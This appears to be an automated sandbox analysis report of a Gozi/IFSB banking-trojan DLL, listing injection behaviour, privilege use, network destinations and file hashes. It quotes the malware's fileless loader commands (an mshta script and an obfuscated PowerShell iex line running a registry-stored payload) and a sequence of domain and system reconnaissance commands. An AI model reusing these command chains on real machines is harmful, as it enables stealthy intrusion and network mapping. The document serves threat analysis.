Analysis Overview
SHA256
44026db9b82303793e896838dd9e85def8b501ec72e3b64584db38212ea312f5
Threat Level: Known bad
The file f9d778ad3bfea174401f36a2d88851d8 was found to be: Known bad.
Malicious Activity Summary
Gozi, Gozi IFSB
Checks computer location settings
Suspicious use of SetThreadContext
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Enumerates processes with tasklist
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of SetWindowsHookEx
Discovers systems in the same network
Gathers system information
Runs net.exe
Suspicious behavior: MapViewOfSection
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-08-09 12:40
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-08-09 12:40
Reported
2022-08-09 12:42
Platform
win7-20220718-en
Max time kernel
42s
Max time network
46s
Command Line
Signatures
Gozi, Gozi IFSB
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1956 wrote to memory of 1968 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 1956 wrote to memory of 1968 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 1956 wrote to memory of 1968 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 1956 wrote to memory of 1968 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 1956 wrote to memory of 1968 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 1956 wrote to memory of 1968 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 1956 wrote to memory of 1968 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
Processes
C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\f9d778ad3bfea174401f36a2d88851d8.dll
C:\Windows\SysWOW64\regsvr32.exe
/s C:\Users\Admin\AppData\Local\Temp\f9d778ad3bfea174401f36a2d88851d8.dll
Network
Files
memory/1956-54-0x000007FEFBAA1000-0x000007FEFBAA3000-memory.dmp
memory/1968-55-0x0000000000000000-mapping.dmp
memory/1968-56-0x00000000756B1000-0x00000000756B3000-memory.dmp
memory/1968-57-0x0000000010000000-0x000000001000E000-memory.dmp
memory/1968-62-0x00000000002B0000-0x00000000002BD000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2022-08-09 12:40
Reported
2022-08-09 12:42
Platform
win10v2004-20220721-en
Max time kernel
150s
Max time network
146s
Command Line
Signatures
Gozi, Gozi IFSB
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\mshta.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1436 set thread context of 60 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Explorer.EXE |
| PID 60 set thread context of 3524 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe |
| PID 60 set thread context of 3812 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe |
| PID 60 set thread context of 1768 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe |
| PID 60 set thread context of 4660 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe |
| PID 60 set thread context of 3584 | N/A | C:\Windows\Explorer.EXE | C:\Windows\syswow64\cmd.exe |
Enumerates physical storage devices
Discovers systems in the same network
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\f9d778ad3bfea174401f36a2d88851d8.dll
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\SysWOW64\regsvr32.exe
/s C:\Users\Admin\AppData\Local\Temp\f9d778ad3bfea174401f36a2d88851d8.dll
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Gxyr='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Gxyr).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\53818B71-9696-FD5C-3837-2A81EC5BFE45\\\SystemText'));if(!window.flag)close()</script>"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name nyjpos -value gp; new-alias -name jbusogjixu -value iex; jbusogjixu ([System.Text.Encoding]::ASCII.GetString((nyjpos "HKCU:Software\AppDataLow\Software\Microsoft\53818B71-9696-FD5C-3837-2A81EC5BFE45").StopName))
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\c35dm5m1\c35dm5m1.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF666.tmp" "c:\Users\Admin\AppData\Local\Temp\c35dm5m1\CSC746DBB6C54F74D7BAFF09F9D952EFF4A.TMP"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nujw4rst\nujw4rst.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF750.tmp" "c:\Users\Admin\AppData\Local\Temp\nujw4rst\CSCA36D566C37834C179A172717BBA0DA71.TMP"
C:\Windows\system32\cmd.exe
cmd /C "wmic computersystem get domain |more > C:\Users\Admin\AppData\Local\Temp\BA64.bin1"
C:\Windows\syswow64\cmd.exe
"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get domain
C:\Windows\system32\more.com
more
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\BA64.bin1"
C:\Windows\system32\cmd.exe
cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\BA64.bin1"
C:\Windows\system32\systeminfo.exe
systeminfo.exe
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\BA64.bin1"
C:\Windows\system32\cmd.exe
cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\BA64.bin1"
C:\Windows\system32\net.exe
net view
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\BA64.bin1"
C:\Windows\system32\cmd.exe
cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\BA64.bin1"
C:\Windows\system32\nslookup.exe
nslookup 127.0.0.1
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\BA64.bin1"
C:\Windows\system32\cmd.exe
cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\BA64.bin1"
C:\Windows\system32\tasklist.exe
tasklist.exe /SVC
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\BA64.bin1"
C:\Windows\system32\cmd.exe
cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\BA64.bin1"
C:\Windows\system32\driverquery.exe
driverquery.exe
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\BA64.bin1"
C:\Windows\system32\cmd.exe
cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\BA64.bin1"
C:\Windows\system32\reg.exe
reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\BA64.bin1"
C:\Windows\system32\cmd.exe
cmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\BA64.bin1"
C:\Windows\system32\net.exe
net config workstation
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 config workstation
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\BA64.bin1"
C:\Windows\system32\cmd.exe
cmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\BA64.bin1"
C:\Windows\system32\nltest.exe
nltest /domain_trusts
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\BA64.bin1"
C:\Windows\system32\cmd.exe
cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\BA64.bin1"
C:\Windows\system32\nltest.exe
nltest /domain_trusts /all_trusts
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\BA64.bin1"
C:\Windows\system32\cmd.exe
cmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\BA64.bin1"
C:\Windows\system32\net.exe
net view /all /domain
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\BA64.bin1"
C:\Windows\system32\cmd.exe
cmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\BA64.bin1"
C:\Windows\system32\net.exe
net view /all
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\BA64.bin1"
C:\Windows\system32\cmd.exe
cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\BA64.bin1 > C:\Users\Admin\AppData\Local\Temp\BA64.bin & del C:\Users\Admin\AppData\Local\Temp\BA64.bin1"
Network
| Country | Destination | Domain | Proto |
| US | 93.184.220.29:80 | tcp | |
| FR | 2.18.109.224:443 | tcp | |
| NL | 20.50.201.200:443 | tcp | |
| US | 93.184.221.240:80 | tcp | |
| US | 93.184.221.240:80 | tcp | |
| US | 93.184.221.240:80 | tcp | |
| US | 13.107.42.16:80 | config.edge.skype.com | tcp |
| NL | 79.110.52.8:80 | 79.110.52.8 | tcp |
| RU | 5.42.199.72:80 | 5.42.199.72 | tcp |
| NL | 79.110.52.82:80 | 79.110.52.82 | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.0.0.127.in-addr.arpa | udp |
Files
memory/4288-130-0x0000000000000000-mapping.dmp
memory/4288-131-0x0000000010000000-0x000000001000E000-memory.dmp
memory/4288-136-0x00000000013C0000-0x00000000013CD000-memory.dmp
memory/1436-140-0x0000000000000000-mapping.dmp
memory/1436-141-0x000001DFA1AF0000-0x000001DFA1B12000-memory.dmp
memory/1436-142-0x000001DF88AF0000-0x000001DF895B1000-memory.dmp
memory/1972-143-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\c35dm5m1\c35dm5m1.cmdline
| MD5 | fe44b87ca2fa7624e8bc9c803912179e |
| SHA1 | 1e18dd6710f1e48dca0b9f10d4e17bc2e2c6491a |
| SHA256 | 4ac321b0d0367c6645d0a4c0a51e060e9ac799b1a4e641318a2fcdbf7595211f |
| SHA512 | a2294c281358b59399a84025ec9278c2a4502fa242955196ec6bc7cbd6c38025233559e9d17f45ae7702ff2d48eefc0e317b77ac9f6b78cac7a730a5ada5a5ef |
\??\c:\Users\Admin\AppData\Local\Temp\c35dm5m1\c35dm5m1.0.cs
| MD5 | 9a10482acb9e6952b96f4efc24d9d783 |
| SHA1 | 5cfc9bf668351df25fcda98c3c2d0bb056c026c3 |
| SHA256 | a0424e1530f002761a882c19c22504153a5e86d7fbb41391e940452bfa15f377 |
| SHA512 | e932914ad99d7bd39561e020d1e8c1f4e175c16eae66df720100c65e40ccc3383b5145f703432885f3f1ce080e8a4feb045ddd5c8bbc2f3231c619d04182ac28 |
memory/4832-146-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\c35dm5m1\CSC746DBB6C54F74D7BAFF09F9D952EFF4A.TMP
| MD5 | 8705a8eacec366e67b0ea18bc7ffb133 |
| SHA1 | e1090791693a784ec5829e79223e5e852e4dac00 |
| SHA256 | dcc291f67eeef3a9d0fe3568b68d67ced00b6ca8bf1c95ec7d7450462d0a52d5 |
| SHA512 | 91f3a72daf17605f73e974541640102ec08ebd4ac9953c84cd6b368096a71768ed7a733287641b829cdfb520b100d8cbc6bddbd72b54b32be33f0ff8a54f2940 |
C:\Users\Admin\AppData\Local\Temp\RESF666.tmp
| MD5 | d70cef3451ab127975248b30db57fea2 |
| SHA1 | fde119de2890d1e0daecd635ac8c4b908e45c8ad |
| SHA256 | 488ccc13eadfed7d4023d9c1e5f3c8f4ce55f88d268632e8d52612c23965586d |
| SHA512 | 876cf97a89ff44781fe47f99121dc372e5fcc120f3a9a4cc32a550934bafe20efe7dd539c4142ed9bfc9710f42d5ea4ad5cef8bdec1d49d5ead62ec0ed482956 |
C:\Users\Admin\AppData\Local\Temp\c35dm5m1\c35dm5m1.dll
| MD5 | ae93569b76b6f7195348268fb504b4c7 |
| SHA1 | 9cf5e0854eba9f26bded3f9ef9392514dcbab18a |
| SHA256 | d688e35da4b5df389fbb4943ac33ec878ff682a2176735acfdce7fa7eafb1e05 |
| SHA512 | 92c26da273d3793d13a166322f327349443d96a6b0f320009cdee97304891c4ac3ae263174b03dc6260b27e1b63a0886f2f9cd47e0518ceef14cc3dde274358d |
memory/2916-150-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\nujw4rst\nujw4rst.cmdline
| MD5 | 66a263050a1730b124ae1871b5b51d74 |
| SHA1 | a5ce671036c5787ac8c97aa84b0994d9ff3776c4 |
| SHA256 | 68588bfab5b405e99101d818148327c7c6cba6caa50215ef1ecc3769a6a7ed6b |
| SHA512 | 9cba05a4104518871493a1443cc5685fcad19aa2b330b5bcd3e27483b034552be6cf8f6c1573bb8e362ff2c9e4b6a7d8e37da4614752e85ca22a1f92c9e296ad |
\??\c:\Users\Admin\AppData\Local\Temp\nujw4rst\nujw4rst.0.cs
| MD5 | aca9704199c51fde14b8bf8165bc2a4c |
| SHA1 | 789b408ccad29240bd093515cbd19a199ad2c1c8 |
| SHA256 | cb3da8a9768252634f8ed4c62e026dc8217b055e00f11b6012a52ed130c92c27 |
| SHA512 | a8c1df598581f508ecbf1e516744f11abfb71ec6bb9895d0b61f15e70e56e27cb40b4e5395b9411b787f8bb4f264ca704d815260677909dc1e599d601d0b5de6 |
memory/3572-153-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\nujw4rst\CSCA36D566C37834C179A172717BBA0DA71.TMP
| MD5 | 3d6564256dba26d9c46e8af92f7c59a7 |
| SHA1 | 5c10f11a8d51d60d45708bf5f87e5d16cea54729 |
| SHA256 | 957837e52370d7b4d034b67ff27ca35c6757acdda42ad361fb550f749490ce12 |
| SHA512 | e6b4d15c405d2a75454032ac17a98d5d7136aa3f0dccf461f88f05ab6b68fd9563508c3b9d12a7a6eb25028eafaca95fd21d7054921f91b4aacc1968b66fe3e4 |
C:\Users\Admin\AppData\Local\Temp\RESF750.tmp
| MD5 | c7ee93e4bfb23e67e73bae21571531d6 |
| SHA1 | 8e1c5d2701c9e93dbe1f0c6618418f23e715cc04 |
| SHA256 | 10b955e3992bf8d46d478a83aeeea7556d39b7eb7f566685a65bc51db586b7f9 |
| SHA512 | 5c75b64572bf0efbad91f526316fd87d069193b1e556225c903573eefa516840623cd3f3b3ad2c71a3353fa2db3f67d1a9944e8ab627e9e092a5e863dd0ae411 |
C:\Users\Admin\AppData\Local\Temp\nujw4rst\nujw4rst.dll
| MD5 | bc884681819d59ed858e7a1fc27fee76 |
| SHA1 | 80fa630b948a97047a84cac8a73e8018d933058e |
| SHA256 | 3007cb8bdd1d62ec0dd81899c66f95c45ca06d67584899f3b45f8447ee014cc8 |
| SHA512 | b7a516e9cab108085000cf354e7758707931056710c75331e033e61218839151dc7939ff5ebba57b638a37c47c9c5efa33ea6a3f1c91d0685fa9f7b9fbf15311 |
memory/1436-157-0x000001DF88AF0000-0x000001DF895B1000-memory.dmp
memory/1436-158-0x000001DFA1E80000-0x000001DFA1EBD000-memory.dmp
memory/3524-159-0x000001CBA90B0000-0x000001CBA9153000-memory.dmp
memory/60-161-0x0000000007EA0000-0x0000000007F43000-memory.dmp
memory/1768-162-0x000001B342370000-0x000001B342413000-memory.dmp
memory/3812-160-0x000001729AD70000-0x000001729AE13000-memory.dmp
memory/4660-163-0x0000013AA7B10000-0x0000013AA7BB3000-memory.dmp
memory/1468-164-0x0000000000000000-mapping.dmp
memory/3584-165-0x0000000000000000-mapping.dmp
memory/2840-166-0x0000000000000000-mapping.dmp
memory/2944-167-0x0000000000000000-mapping.dmp
memory/3584-168-0x00000000001A6B20-0x00000000001A6B24-memory.dmp
memory/3584-169-0x00000000015C0000-0x0000000001656000-memory.dmp
memory/60-170-0x000000000AAC0000-0x000000000ABFB000-memory.dmp
memory/4436-174-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\BA64.bin1
| MD5 | f7aea2435aa888b709ca20f816c33bfd |
| SHA1 | 38717c9a73b5f8bd399839cbe0aa57518427e758 |
| SHA256 | f0c30a157e0a0ea84b114c2b66a66d444a3824c2bfe7829d929b40e6548fa5d5 |
| SHA512 | 1ea828fc1932c97f5ba5f6ebf05f2816d4d89f003b094f2d0868d54f52b53774437037e2c8837e97b820d5f2e5d5707825b048a9ab2af261af00810f01bd8232 |
memory/4272-176-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\BA64.bin1
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/4256-178-0x0000000000000000-mapping.dmp
memory/60-179-0x000000000AE00000-0x000000000AF3A000-memory.dmp
memory/344-183-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\BA64.bin1
| MD5 | 81e5279cdc4dd4b735bcf24c01a7bb2f |
| SHA1 | 32fc813ad8788d890f42465871c6018a27d13f69 |
| SHA256 | 6d9f6f7f714b3212d395a23bd90c415b7557f77fa6639deba983694f262fa80e |
| SHA512 | b3ff8ee16285da55f77fb6ee3054b912c9b7bd713d38df31e84d590214a1f38e470b7c49cfde21739cfaf51d74aaa06b7e744c332d25102f26fb6625c814989b |
memory/4248-185-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\BA64.bin1
| MD5 | 81e5279cdc4dd4b735bcf24c01a7bb2f |
| SHA1 | 32fc813ad8788d890f42465871c6018a27d13f69 |
| SHA256 | 6d9f6f7f714b3212d395a23bd90c415b7557f77fa6639deba983694f262fa80e |
| SHA512 | b3ff8ee16285da55f77fb6ee3054b912c9b7bd713d38df31e84d590214a1f38e470b7c49cfde21739cfaf51d74aaa06b7e744c332d25102f26fb6625c814989b |
memory/4528-187-0x0000000000000000-mapping.dmp
memory/60-188-0x0000000007EA0000-0x0000000007F43000-memory.dmp
memory/3504-189-0x0000000000000000-mapping.dmp
memory/3968-190-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\BA64.bin1
| MD5 | 20ec779e4e952197cd7d3634340a64df |
| SHA1 | 729b0b13b11bc040082008582de505943fb519ff |
| SHA256 | 10b32a3a7ba8816ed97396117d85ac54fede545e026518591ce9e47daabbed20 |
| SHA512 | 7d95d9ad80c3a3432a5af688e73d909baf2ad888b56bc12cdd5c47facf8b5907701abb2ed4c8190a8874f3e2fde90e0c838cf84e64c0d21bdc3df84bdf41b5ce |
memory/2740-192-0x0000000000000000-mapping.dmp
memory/2800-193-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\BA64.bin1
| MD5 | c49baf7b191e35153f2547e04eb9fc34 |
| SHA1 | 876ced4f080a4d74bc31237d265595bfafa689a3 |
| SHA256 | 725e4d5534b71c115d7b807f0ac7410780a1e6baf6730a8d2995ed7ba7b33bfe |
| SHA512 | ec22771c6f092dc3b654fad2e3a0134c95922860f194b38878becff27ca708ffe41c1a1df59f2f8778cfd5e08d8b4450f5ece3f698686fc37b25545801e14b96 |
memory/4220-195-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\BA64.bin1
| MD5 | c49baf7b191e35153f2547e04eb9fc34 |
| SHA1 | 876ced4f080a4d74bc31237d265595bfafa689a3 |
| SHA256 | 725e4d5534b71c115d7b807f0ac7410780a1e6baf6730a8d2995ed7ba7b33bfe |
| SHA512 | ec22771c6f092dc3b654fad2e3a0134c95922860f194b38878becff27ca708ffe41c1a1df59f2f8778cfd5e08d8b4450f5ece3f698686fc37b25545801e14b96 |
memory/4072-197-0x0000000000000000-mapping.dmp
memory/2616-198-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\BA64.bin1
| MD5 | 2538afc623fe1500ea552c9737eccabc |
| SHA1 | 8b713505e5e71eb5a032c75a22ea5b5758f56c2c |
| SHA256 | fd29e1458bdde94aaf6efb141a29b4fabe6467811c4b99bcba8c79d02e9c5534 |
| SHA512 | 3930cdc12394de23481f17c2dd25e9d531f3791a674af884a168c2e7ce5223295ad3eab0b240b10689c970f5f0924a915aef7f89822a312f3804b6765c408c71 |
memory/4968-200-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\BA64.bin1
| MD5 | 34e778c892b92665a4d409a248d457b6 |
| SHA1 | a11ced873ea5272bca350c311a30426514c5db2d |
| SHA256 | 50a509935381e2cc64b235e3083285fd6410d1106c117f388b76a26afb901634 |
| SHA512 | ec9e4bb8f4fa58466af1f88b464c5b8660776ef7f99aa58b0f6eee5181167f1de6aba49bc6ace1e24ac34bc536d2f121524fc81e719ae6c1688cb4936caeccb3 |
memory/4776-202-0x0000000000000000-mapping.dmp
memory/368-203-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\BA64.bin1
| MD5 | 188dd26def821b97b964aa5b2e272d8f |
| SHA1 | 385171700fd4b10a84ec82e6adeeb04b40e89cf0 |
| SHA256 | 793271214cb58ff61d8165d2d0b3db1a0d2b9436866b46525f46478f74dc61a2 |
| SHA512 | 3b851ca2925b2017808af930096769538634120612237a0e191ec254a32c9803e14505dc728cf54a39842acf41728f62ed9d206ed5739d42b85b8edf5bec3d31 |
memory/1808-205-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\BA64.bin1
| MD5 | 188dd26def821b97b964aa5b2e272d8f |
| SHA1 | 385171700fd4b10a84ec82e6adeeb04b40e89cf0 |
